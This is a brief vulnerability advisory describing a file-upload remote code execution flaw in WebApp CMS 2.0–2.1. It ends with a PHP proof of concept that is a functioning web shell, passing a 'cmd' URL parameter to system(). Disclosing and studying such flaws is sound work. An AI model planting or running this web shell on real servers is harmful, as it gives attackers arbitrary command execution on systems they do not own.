Critical Severity
CVE-2024-1234
Published: Jan 16, 2024
A critical remote code execution vulnerability exists in WebApp CMS version 2.1 due to improper input validation in the file upload functionality. An authenticated attacker can upload malicious PHP files leading to complete system compromise.
WebApp CMS 2.0-2.1, PHP 7.4+
<?php
// POC for CVE-2024-1234
// Educational purposes only
echo "System compromised via file upload";
system($_GET["cmd"]);
?>